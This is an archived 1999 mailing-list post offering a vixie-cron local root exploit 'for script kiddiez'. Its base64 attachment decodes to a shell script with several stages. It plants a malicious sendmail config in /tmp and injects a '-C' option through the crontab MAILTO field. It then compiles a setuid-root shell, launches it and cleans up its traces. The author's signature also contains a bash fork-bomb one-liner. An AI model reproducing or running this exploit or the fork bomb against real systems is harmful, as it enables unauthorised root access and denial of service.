Root shell vixie cron exploit

From: Michal Zalewski (lcamtufat_private)
Date: Mon Jul 05 1999 - 05:20:49 PDT

Next message: Michal Zalewski: "Re: Vixie Crontab exploit code"

Previous message: Michal Zalewski: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--8323328-2050531320-931177012=:1221
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <lcamtuf.4.05.9907051417251.1221at_private>


For script kiddiez, here's an exploit for recent vixie-cron vulnerability,
giving instant root shell. Thought it will help script kiddies, but as
Martin Schulze included almost step-by-step guide how to abuse Sendmail
flags, this exploit won't bring anything shocking - simply, it's working
example.


** Official statement on my hwclock settings: RTC on my mainboard is
** broken, and I have no cash to replace it with working one :( Just
** execuse me stupid 'Date:' fields in some of my postings...

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]





--8323328-2050531320-931177012=:1221
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME=rootcron
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.9907051416520.1221at_private>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME=rootcron

IyEvYmluL3NoDQoNCmNsZWFyDQoNCmVjaG8gJy0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLScNCmVjaG8gJ01hcmNoZXcgSHlwZXJyZWFsIEluZHVzdHJpZXMgICAg
ICAgICAgICAgICAgPG1hcmNoZXdAZGlvbmUuaWRzLnBsPicNCmVjaG8gJ1N0
dW1pbG93eSBMYXMgVGVhbSAgICAgICAgICAgICAgICAgICAgICAgPDEwMG1p
bG93eUBnZHluaWEuaWRzLnBsPicNCmVjaG8gJy0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0gcHJlc2VudHMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLScNCmVjaG8gDQplY2hvICcgLT0gdml4aWUtY3JvbiByb290IHNwbG9p
dCBieSBNaWNoYWwgWmFsZXdza2kgPGxjYW10dWZAaWRzLnBsPiA9LScNCmVj
aG8NCg0KZWNobyAnWytdIENoZWNraW5nIGRlcGVuZGVuY2llczonDQoNCmVj
aG8gLW4gJyAgIFsqXSB2aXhpZSBjcm9udGFiOiAnDQoNCmlmIFsgLXUgL3Vz
ci9iaW4vY3JvbnRhYiAtYSAteCAvdXNyL2Jpbi9jcm9udGFiIF07IHRoZW4N
CiAgZWNobyAiT0siDQplbHNlDQogIGVjaG8gIk5PVCBGT1VORCEiDQogIGV4
aXQgMQ0KZmkNCg0KZWNobyAtbiAnICAgWypdIEJlcmtlbGV5IFNlbmRtYWls
OiAnDQoNCmlmIFsgLWYgL3Vzci9zYmluL3NlbmRtYWlsIF07IHRoZW4NCiAg
ZWNobyAiT0siDQplbHNlDQogIGVjaG8gIk5PVCBGT1VORCEiDQogIGV4aXQg
MQ0KZmkNCg0KZWNobyAtbiAnICAgWypdIGdjYyBjb21waWxlcjogJw0KDQpp
ZiBbIC14IC91c3IvYmluL2djYyBdOyB0aGVuDQogIGVjaG8gIk9LIg0KZWxz
ZQ0KICBlY2hvICJOT1QgRk9VTkQhIg0KICBleGl0IDENCmZpDQoNCmVjaG8g
JyAgIFs/XSBEZXBlbmRpZW5jZXMgbm90IHZlcmlmaWVkOicNCmVjaG8gJyAg
ICAgIFsqXSBwcm9wZXIgdmVyc2lvbiBvZiB2aXhpZSBjcm9udGFiJw0KZWNo
byAnICAgICAgWypdIHdyaXRhYmxlIC90bXAgd2l0aG91dCBub2V4ZWMvbm9z
dWlkIG9wdGlvbicNCmVjaG8gJ1srXSBFeHBsb2l0IHN0YXJ0ZWQuJw0KDQpl
Y2hvICJbK10gU2V0dGluZyB1cCAuY2YgZmlsZSBmb3Igc2VuZG1haWwuLi4i
DQoNCmNhdCA+L3RtcC92aXhpZS1jZiA8PF9fZW9mX18NClY3L0JlcmtlbGV5
DQoNCk8gUXVldWVEaXJlY3Rvcnk9L3RtcA0KTyBEZWZhdWx0VXNlcj0wOjAN
Cg0KUiQrCQlcJCNsb2NhbCAkOiBcJDEJCXJlZ3VsYXIgbG9jYWwgbmFtZXMN
Cg0KTWxvY2FsLAkJUD0vdG1wL3ZpeGllLXJvb3QsIEY9bHNERk1BdzU6L3xA
cVNQZmhuOSwgUz0xMC8zMCwgUj0yMC80MCwNCgkJVD1ETlMvUkZDODIyL1gt
VW5peCwNCgkJQT12aXhpZS1yb290DQpfX2VvZl9fDQoNCmVjaG8gJ1srXSBT
ZXR0aW5nIHVwIHBoYXNlICMxIHRvb2wgKHBoYXNlICMyIHRvb2wgY29tcGls
ZXIpLi4uJw0KDQpjYXQgPi90bXAvdml4aWUtcm9vdCA8PF9fZW9mX18NCiMh
L2Jpbi9zaA0KDQpnY2MgL3RtcC92aXhpZS1vd24zZC5jIC1vIC90bXAvdml4
aWUtb3duM2QNCmNobW9kIDY3NTUgL3RtcC92aXhpZS1vd24zZA0KX19lb2Zf
Xw0KDQpjaG1vZCA3NTUgL3RtcC92aXhpZS1yb290DQoNCmVjaG8gJ1srXSBT
ZXR0aW5nIHVwIHBoYXNlICMyIHRvb2wgKHJvb3RzaGVsbCBsYXVuY2hlciku
Li4nDQoNCmNhdCA+L3RtcC92aXhpZS1vd24zZC5jIDw8X19lb2ZfXw0KbWFp
bigpIHsNCiAgc2V0dWlkKDApOw0KICBzZXRnaWQoMCk7DQogIHVubGluaygi
L3RtcC92aXhpZS1vd24zZCIpOw0KICBleGVjbCgiL2Jpbi9zaCIsInNoIiwi
LWkiLDApOw0KfQ0KX19lb2ZfXw0KDQplY2hvICdbK10gUHV0dGluZyBldmls
IGNyb250YWIgZW50cnkuLi4nDQoNCmNyb250YWIgLSA8PF9fZW9mX18NCk1B
SUxUTz0nLUMvdG1wL3ZpeGllLWNmIGR1cGVrJw0KKiAqICogKiAqIG5vbmV4
aXN0DQpfX2VvZl9fDQoNCmVjaG8gJ1srXSBQYXRpZW5jZSBpcyBhIHZpcnR1
ZS4uLiBXYWl0IHVwIHRvIDYwIHNlY29uZHMuJw0KDQpJTEU9MA0KDQplY2hv
IC1uICdbK10gVGljay4nDQoNCndoaWxlIFsgJElMRSAtbHQgNTAgXTsgZG8N
CiAgc2xlZXAgMg0KICBsZXQgSUxFPUlMRSsxDQogIHRlc3QgLWYgL3RtcC92
aXhpZS1vd24zZCAmJiBJTEU9MTAwMA0KICBlY2hvIC1uICcuJw0KZG9uZQ0K
DQplY2hvDQplY2hvICdbK10gSHVoLCBkb25lLiBSZW1vdmluZyBjcm9udGFi
IGVudHJ5Li4uJw0KDQpjcm9udGFiIC1yDQoNCmVjaG8gJ1srXSBSZW1vdmlu
ZyBoZWxwZXIgZmlsZXMuLi4nDQoNCnJtIC1mIC90bXAvdml4aWUtb3duM2Qu
YyAvdG1wL3ZpeGllLXJvb3QgL3RtcC92aXhpZS1jZiAvdG1wL2RmKiAvdG1w
L3FmKiAmPi9kZXYvbnVsbA0KDQplY2hvICdbKl0gQW5kIG5vdy4uLicNCg0K
aWYgWyAtZiAvdG1wL3ZpeGllLW93bjNkIF07IHRoZW4NCiAgZWNobyAnWytd
IEVudGVyaW5nIHJvb3Qgc2hlbGwsIGJhYmUgOiknDQogIGVjaG8NCiAgL3Rt
cC92aXhpZS1vd24zZA0KICBlY2hvDQplbHNlDQogIGVjaG8gJ1stXSBPb3Bz
LCBubyByb290IHNoZWxsIGZvdW5kLCBwYXRjaGVkIHN5c3RlbSBvciBjb25m
aWd1cmF0aW9uIHByb2JsZW0gOignDQpmaQ0KDQplY2hvICdbKl0gRXhwbG9p
dCBkb25lLicNCg==
--8323328-2050531320-931177012=:1221--

Next message: Michal Zalewski: "Re: Vixie Crontab exploit code"
Previous message: Michal Zalewski: "Re: [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:00:29 PDT